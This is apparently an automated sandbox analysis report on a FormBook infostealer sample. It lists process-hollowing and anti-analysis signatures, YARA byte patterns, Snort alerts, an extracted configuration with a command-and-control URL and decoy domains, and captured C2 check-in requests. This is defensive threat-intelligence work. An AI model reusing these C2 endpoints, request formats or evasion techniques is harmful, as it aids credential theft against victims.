Loading ...

Play interactive tourEdit tour

Windows Analysis Report v8kZUFgdD4.exe

Overview

General Information

Sample Name:v8kZUFgdD4.exe
Analysis ID:452667
MD5:57f3ae2842ffb5ceea386d0b97a52818
SHA1:68423398d025d3cbbb944ee4c3cea5501df67761
SHA256:a0c7b3d44a5cfcda917fc80c099da5ab3de582ff7c24f1373b4bd25f88d61e52
Tags:exeFormbook
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Uses ipconfig to lookup or modify the Windows network settings
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • v8kZUFgdD4.exe (PID: 724 cmdline: 'C:\Users\user\Desktop\v8kZUFgdD4.exe' MD5: 57F3AE2842FFB5CEEA386D0B97A52818)
    • v8kZUFgdD4.exe (PID: 6148 cmdline: 'C:\Users\user\Desktop\v8kZUFgdD4.exe' MD5: 57F3AE2842FFB5CEEA386D0B97A52818)
      • explorer.exe (PID: 3440 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • ipconfig.exe (PID: 6580 cmdline: C:\Windows\SysWOW64\ipconfig.exe MD5: B0C7423D02A007461C850CD0DFE09318)
          • cmd.exe (PID: 6744 cmdline: /c del 'C:\Users\user\Desktop\v8kZUFgdD4.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6760 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.extinctionbrews.com/dy8g/"], "decoy": ["mzyxi-rkah-y.net", "okinawarongnho.com", "qq66520.com", "nimbus.watch", "cwdelrio.com", "regalshopper.com", "avito-payment.life", "jorgeporcayo.com", "galvinsky.digital", "guys-only.com", "asmfruits-almacenes.com", "boatrace-life04.net", "cochez.club", "thelastvictor.net", "janieleconte.com", "ivoirepneus.com", "saludflv.info", "mydreamtv.net", "austinphy.com", "cajunseafoodstcloud.com", "13006608192.com", "clear3media.com", "thegrowclinic.com", "findfoodshop.com", "livegaming.store", "greensei.com", "atmaapothecary.com", "builtbydawn.com", "wthcoffee.com", "melodezu.com", "oikoschain.com", "matcitekids.com", "killrstudio.com", "doityourselfism.com", "monsoonnerd.com", "swissbankmusic.com", "envisionfordheights.com", "invisiongc.net", "aizaibali.com", "professioneconsulenza.net", "chaneabond.com", "theamercianhouseboat.com", "scuolatua.com", "surivaganza.com", "xn--vuq722jwngjre.com", "quiteimediato.space", "ecofingers.com", "manageoceanaccount.com", "cindywillardrealtor.com", "garimpeirastore.online", "tinsley.website", "fitnesstwentytwenty.com", "thenorthgoldline.com", "scuolacounselingroma.com", "iwccgroup.com", "wideawakemomma.com", "anthonysavillemiddleschool.com", "sprinkleresources.com", "ravexim3.com", "onedadtwodudes.com", "shxytl.com", "iriscloudvideo.com", "theshapecreator.com", "vermogenswerte.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.599150521.0000000001330000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000007.00000002.599150521.0000000001330000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000007.00000002.599150521.0000000001330000.00000004.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166c9:$sqlite3step: 68 34 1C 7B E1
    • 0x167dc:$sqlite3step: 68 34 1C 7B E1
    • 0x166f8:$sqlite3text: 68 38 2A 90 C5
    • 0x1681d:$sqlite3text: 68 38 2A 90 C5
    • 0x1670b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16833:$sqlite3blob: 68 53 D8 7F 8C
    00000001.00000002.389518635.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000001.00000002.389518635.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 19 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      0.2.v8kZUFgdD4.exe.21d0000.2.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        0.2.v8kZUFgdD4.exe.21d0000.2.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        0.2.v8kZUFgdD4.exe.21d0000.2.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x166c9:$sqlite3step: 68 34 1C 7B E1
        • 0x167dc:$sqlite3step: 68 34 1C 7B E1
        • 0x166f8:$sqlite3text: 68 38 2A 90 C5
        • 0x1681d:$sqlite3text: 68 38 2A 90 C5
        • 0x1670b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x16833:$sqlite3blob: 68 53 D8 7F 8C
        0.2.v8kZUFgdD4.exe.21d0000.2.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          0.2.v8kZUFgdD4.exe.21d0000.2.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x77f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7b92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x138a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x13391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x139a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x85aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1260c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9322:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18997:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19a3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 8 entries

          Sigma Overview

          No Sigma rule has matched

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Antivirus detection for URL or domainShow sources
          Source: http://www.findfoodshop.com/dy8g/?i0GDM=4wzaECy4GBTuQnITbNLpu7AOQbyqIYrzJAsJNgGB2dTR99UQwJdt+FpFkOawEfEVdOlYoXAvoA==&0X=C6Ah3vPxAvira URL Cloud: Label: malware
          Source: http://www.invisiongc.net/dy8g/?i0GDM=MBhh1pO56K3YrZO9qJkl6N96HaWfS+D/lXW6/vw2t4O2Fl+GB2YqMK2ZraksguVxeKRya9uu2A==&0X=C6Ah3vPxAvira URL Cloud: Label: malware
          Found malware configurationShow sources
          Source: 00000007.00000002.599150521.0000000001330000.00000004.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.extinctionbrews.com/dy8g/"], "decoy": ["mzyxi-rkah-y.net", "okinawarongnho.com", "qq66520.com", "nimbus.watch", "cwdelrio.com", "regalshopper.com", "avito-payment.life", "jorgeporcayo.com", "galvinsky.digital", "guys-only.com", "asmfruits-almacenes.com", "boatrace-life04.net", "cochez.club", "thelastvictor.net", "janieleconte.com", "ivoirepneus.com", "saludflv.info", "mydreamtv.net", "austinphy.com", "cajunseafoodstcloud.com", "13006608192.com", "clear3media.com", "thegrowclinic.com", "findfoodshop.com", "livegaming.store", "greensei.com", "atmaapothecary.com", "builtbydawn.com", "wthcoffee.com", "melodezu.com", "oikoschain.com", "matcitekids.com", "killrstudio.com", "doityourselfism.com", "monsoonnerd.com", "swissbankmusic.com", "envisionfordheights.com", "invisiongc.net", "aizaibali.com", "professioneconsulenza.net", "chaneabond.com", "theamercianhouseboat.com", "scuolatua.com", "surivaganza.com", "xn--vuq722jwngjre.com", "quiteimediato.space", "ecofingers.com", "manageoceanaccount.com", "cindywillardrealtor.com", "garimpeirastore.online", "tinsley.website", "fitnesstwentytwenty.com", "thenorthgoldline.com", "scuolacounselingroma.com", "iwccgroup.com", "wideawakemomma.com", "anthonysavillemiddleschool.com", "sprinkleresources.com", "ravexim3.com", "onedadtwodudes.com", "shxytl.com", "iriscloudvideo.com", "theshapecreator.com", "vermogenswerte.com"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: v8kZUFgdD4.exeVirustotal: Detection: 38%Perma Link
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 0.2.v8kZUFgdD4.exe.21d0000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.v8kZUFgdD4.exe.21d0000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.v8kZUFgdD4.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.v8kZUFgdD4.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.v8kZUFgdD4.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000002.599150521.0000000001330000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.389518635.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.597969689.0000000000EA0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.341137782.00000000021D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.389832598.00000000009F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.598432080.0000000001100000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.389732615.00000000005B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.339035509.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: 7.2.ipconfig.exe.3ac7960.5.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 0.2.v8kZUFgdD4.exe.2190000.1.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 7.2.ipconfig.exe.11406b0.0.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 0.2.v8kZUFgdD4.exe.21d0000.2.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.2.v8kZUFgdD4.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.1.v8kZUFgdD4.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: v8kZUFgdD4.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
          Source: Binary string: ipconfig.pdb source: v8kZUFgdD4.exe, 00000001.00000002.389856707.0000000000A20000.00000040.00000001.sdmp
          Source: Binary string: ipconfig.pdbGCTL source: v8kZUFgdD4.exe, 00000001.00000002.389856707.0000000000A20000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000005.00000000.363215324.000000000DC20000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: v8kZUFgdD4.exe, 00000000.00000003.338578386.0000000002500000.00000004.00000001.sdmp, v8kZUFgdD4.exe, 00000001.00000002.389979034.0000000000A30000.00000040.00000001.sdmp, ipconfig.exe, 00000007.00000002.599975463.0000000003590000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: v8kZUFgdD4.exe, ipconfig.exe
          Source: Binary string: wscui.pdb source: explorer.exe, 00000005.00000000.363215324.000000000DC20000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 4x nop then pop esi1_2_00415852
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 4x nop then pop ebx1_2_00406A98
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 4x nop then pop edi1_2_00415699
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4x nop then pop esi7_2_00EB5852
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4x nop then pop ebx7_2_00EA6A99
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4x nop then pop edi7_2_00EB5699

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49748 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49748 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49748 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49753 -> 52.58.78.16:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49753 -> 52.58.78.16:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49753 -> 52.58.78.16:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49762 -> 103.138.88.11:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49762 -> 103.138.88.11:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49762 -> 103.138.88.11:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49763 -> 162.241.62.54:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49763 -> 162.241.62.54:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49763 -> 162.241.62.54:80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.extinctionbrews.com/dy8g/
          Source: global trafficHTTP traffic detected: GET /dy8g/?i0GDM=DjnY/S7/G1yk/GGdjnbMG0pwlAlipgBY8a8MDSEvYTAaE8/8s3MkSQswoGP3cSH4hj9/IphBwA==&0X=C6Ah3vPx HTTP/1.1Host: www.extinctionbrews.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dy8g/?i0GDM=Y4JBfBjBKMGzbUzrNu+ARLK4ZQab+dap1kq40YSvqSzyJ/mfRg4U9+Lz1eKJfRLK3cAmaa0bkw==&0X=C6Ah3vPx HTTP/1.1Host: www.doityourselfism.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dy8g/?i0GDM=X9Az7RthaT8xdqkxQ6tJRjQeFUHqBPh6fb7YU5dnwYv1rghxnAYW3P4f0krKlocv9Wl7uwWiww==&0X=C6Ah3vPx HTTP/1.1Host: www.ecofingers.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dy8g/?i0GDM=MBhh1pO56K3YrZO9qJkl6N96HaWfS+D/lXW6/vw2t4O2Fl+GB2YqMK2ZraksguVxeKRya9uu2A==&0X=C6Ah3vPx HTTP/1.1Host: www.invisiongc.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dy8g/?i0GDM=4wzaECy4GBTuQnITbNLpu7AOQbyqIYrzJAsJNgGB2dTR99UQwJdt+FpFkOawEfEVdOlYoXAvoA==&0X=C6Ah3vPx HTTP/1.1Host: www.findfoodshop.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dy8g/?i0GDM=DyFQJ285GCHWDKdZkYvFextRb5KpVMjfJilCoJQfsM3+VBHaRIBYykQk9iPNEqtroWJ/WwLhcg==&0X=C6Ah3vPx HTTP/1.1Host: www.scuolatua.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dy8g/?i0GDM=uor47PkOoKkLY099HuArMxw1XFE/ncsTlzCE/ODY21NzZk1xVsb5QvrTgLDn7S7AYBCRuXEk2w==&0X=C6Ah3vPx HTTP/1.1Host: www.okinawarongnho.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dy8g/?i0GDM=q7jKWIuNsoGkf7/hAqyN1U3v/GjJJAAs8Ri7ihl8JZVwqZwISrlxTPDImUVNZCFSYJzAIvZikA==&0X=C6Ah3vPx HTTP/1.1Host: www.jorgeporcayo.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 52.58.78.16 52.58.78.16
          Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
          Source: Joe Sandbox ViewASN Name: ARUBA-ASNIT ARUBA-ASNIT
          Source: global trafficHTTP traffic detected: GET /dy8g/?i0GDM=DjnY/S7/G1yk/GGdjnbMG0pwlAlipgBY8a8MDSEvYTAaE8/8s3MkSQswoGP3cSH4hj9/IphBwA==&0X=C6Ah3vPx HTTP/1.1Host: www.extinctionbrews.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dy8g/?i0GDM=Y4JBfBjBKMGzbUzrNu+ARLK4ZQab+dap1kq40YSvqSzyJ/mfRg4U9+Lz1eKJfRLK3cAmaa0bkw==&0X=C6Ah3vPx HTTP/1.1Host: www.doityourselfism.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dy8g/?i0GDM=X9Az7RthaT8xdqkxQ6tJRjQeFUHqBPh6fb7YU5dnwYv1rghxnAYW3P4f0krKlocv9Wl7uwWiww==&0X=C6Ah3vPx HTTP/1.1Host: www.ecofingers.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dy8g/?i0GDM=MBhh1pO56K3YrZO9qJkl6N96HaWfS+D/lXW6/vw2t4O2Fl+GB2YqMK2ZraksguVxeKRya9uu2A==&0X=C6Ah3vPx HTTP/1.1Host: www.invisiongc.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dy8g/?i0GDM=4wzaECy4GBTuQnITbNLpu7AOQbyqIYrzJAsJNgGB2dTR99UQwJdt+FpFkOawEfEVdOlYoXAvoA==&0X=C6Ah3vPx HTTP/1.1Host: www.findfoodshop.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dy8g/?i0GDM=DyFQJ285GCHWDKdZkYvFextRb5KpVMjfJilCoJQfsM3+VBHaRIBYykQk9iPNEqtroWJ/WwLhcg==&0X=C6Ah3vPx HTTP/1.1Host: www.scuolatua.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dy8g/?i0GDM=uor47PkOoKkLY099HuArMxw1XFE/ncsTlzCE/ODY21NzZk1xVsb5QvrTgLDn7S7AYBCRuXEk2w==&0X=C6Ah3vPx HTTP/1.1Host: www.okinawarongnho.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dy8g/?i0GDM=q7jKWIuNsoGkf7/hAqyN1U3v/GjJJAAs8Ri7ihl8JZVwqZwISrlxTPDImUVNZCFSYJzAIvZikA==&0X=C6Ah3vPx HTTP/1.1Host: www.jorgeporcayo.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.aizaibali.com
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: privateContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/8.5X-Powered-By: ASP.NETDate: Thu, 22 Jul 2021 15:44:03 GMTConnection: closeContent-Length: 5045Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 38 2e 35 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 7b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 30 30 36 36 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 31 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 2e 63 6f 6e 66 69 67 5f 73 6f 75 72 63 65 20 63 6f 64 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 65 6d 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0a 70 72 65 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 65 6d 3b 77 6f 72 64 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 3b 7d 20 0a 75 6c 2c 6f 6c 7b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 31 30 70 78 20 35 70 78 3b 7d 20 0a 75 6c 2e 66 69 72 73 74 2c 6f 6c 2e 66 69 72 73 74 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 35 70 78 3b 7d 20 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 62 72 65 61 6b 2d 61 6c 6c 3b 7d 20 0a 2e 73 75 6d 6d 61 72 79 2d 63 6f 6e 74 61 69 6e 65 72 20 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 35 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 34 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 2e 6e 6f 2d 65 78 70 61 6e 64 2d 61 6c 6c 7b 70 61 64 64 69 6e 67 3a 32 70 78 20 31 35 70 78 20 34 70 78 20 31 30 70 78 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 2d 31 32 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 7b 63 6f 6c 6f 72 3a 23 33 33 33 33 33 33 3b 3b 6d 61 72 67 69 6e 3a 34 70 78 20 30 20 38 70 78 20 2d 31 32 70 78 3b 5f 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 70 78 3b 20 0a 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 3b 7d 20 0a 61 3a 6c 69 6e 6b 2c 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 30 30 37 45 46 46 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65
          Source: explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000005.00000000.343561590.000000000095C000.00000004.00000020.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
